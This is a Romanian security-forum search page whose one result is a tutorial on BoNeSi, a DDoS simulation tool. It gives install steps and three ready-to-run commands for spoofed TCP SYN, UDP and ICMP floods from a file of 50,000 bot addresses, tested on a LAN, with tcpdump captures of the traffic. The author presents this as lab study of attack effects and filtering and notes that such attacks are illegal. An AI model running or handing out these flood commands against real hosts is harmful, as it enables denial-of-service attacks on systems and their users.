Jump to content

Search the Community

Showing results for tags 'bonesi'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. Ce este BoNeSi ? BoNeSi este un tool pentru simularea atacurilor DDoS (distributed denial of service) pentru a studia efectele unui atac DDoS cat si posibilitatea de filtrare (sau minimizare a efectelor) unui astfel de atac. Am testat acest tool pe un server local cu Debian utilizand ca SRC IP 10.0.0.7 iar ca DST IP 10.0.0.8 pe care am un server ce ruleaza FreeBSD. La primul test, cel cu protocol tcp, capacitatea atacului a fost de 5096.83 flows/s. Curios este faptul ca desi rata la inbound era de doar 10,16 Mbps, serverul web ce rula pe DST era inaccesibil. La al II-lea test, cel cu protocol udp, capacitatea atacului a fost de 16602.50 flows/s. iar rata la inbound de 3,3 Mbps, iar la al III-lea test, cel cu icmp echo request, capacitatea atacului a fost de 7248.00 flows/s. Cele doua servere folosite la acest test, sunt conectate in LAN printr-un switch Allied Telesis iar link-ul este de 100mbps. In toate testele (tcp, icmp, udp) sursele de atac sunt alterate (spoofed) cu adresele ip din fisierul “50k-bots” Mentionez ca pe sistemul atacat era instalat apache2, prefork (default) si nu erau modificari la ListenBacklog. Instalare pe debian: tex work # apt-get install libnet1-dev libpcap-dev tex work # wget http://bonesi.googlecode.com/files/bonesi-0.1.1.tar.gz tex work # tar zxvf bonesi-0.1.1.tar.gz tex work # cd bonesi-0.1.1 tex bonesi-0.1.1 # ./configure && make tex bonesi-0.1.1 # cp src/bonesi . Utilizare: Test I: Pentru syn spoofed (tcp attack): ./bonesi --ips=50k-bots --protocol=tcp -d eth0 10.0.0.8:80 Test II: Pentru udp spoofed: ./bonesi --ips=50k-bots --protocol=udp -d eth0 10.0.0.8:80 Test III: Pentru icmp spoofed (echo request): ./bonesi --ips=50k-bots --protocol=icmp -d eth0 10.0.0.8:80 Vizualizare pachete cu tcpdump la primul test (5 linii): 02:21:23.681982 IP 88.126.89.159.22458 > 10.0.0.8.80: Flags [S], seq 1237269533, win 4096, options [mss 1402,nop,wscale 0,nop,nop,TS val 1365282408 ecr 0,sackOK,eol], length 0 02:21:23.682074 IP 122.105.124.102.24571 > 10.0.0.8.80: Flags [S], seq 829903001, win 4096, options [mss 1460,nop,sackOK,eol], length 0 02:21:23.682115 IP 240.179.162.42.14539 > 10.0.0.8.80: Flags [S], seq 333938234, win 4096, options [mss 1516,nop,sackOK,eol], length 0 02:21:23.682154 IP 251.224.133.235.14748 > 10.0.0.8.80: Flags [S], seq 1230917056, win 4096, options [mss 1516,nop,sackOK,eol], length 0 02:21:23.682195 IP 48.44.25.215.26626 > 10.0.0.8.80: Flags [S], seq 802302864, win 4096, options [mss 1430,sackOK,TS val 1840537518 ecr 0,nop,wscale 0], length 0 Vizualizare pachete cu tcpdump la al II-lea test (5 linii): 02:28:40.917828 IP 141.162.25.189.34536 > 10.0.0.8.80: UDP, length 32 02:28:40.918783 IP 155.243.83.223.18623 > 10.0.0.8.80: UDP, length 32 02:28:40.918791 IP 255.46.11.142.29747 > 10.0.0.8.80: UDP, length 32 02:28:40.918797 IP 145.217.172.116.33624 > 10.0.0.8.80: UDP, length 32 02:28:40.918804 IP 246.242.203.210.10015 > 10.0.0.8.80: UDP, length 32 Vizualizare pachete cu tcpdump la al III-lea test (5 linii): 02:35:49.156760 IP 11.132.139.168 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.156770 IP 35.68.7.119 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157715 IP 136.87.254.149 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157722 IP 12.23.245.154 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157727 IP 91.33.156.53 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 Note: - Din cate puteti observa, testele sunt facute in LAN. Atacurile DoS/DDoS sunt ilegale. Va sfatuiesc sa nu faceti teste catre retele care nu va apartin (sau cel putin, nu dupa ip-urile voastre) - Am specificat la inceput la ce anume poate fi de folos (tot din acest motiv, am facut captura la pachete)
×
×
  • Create New...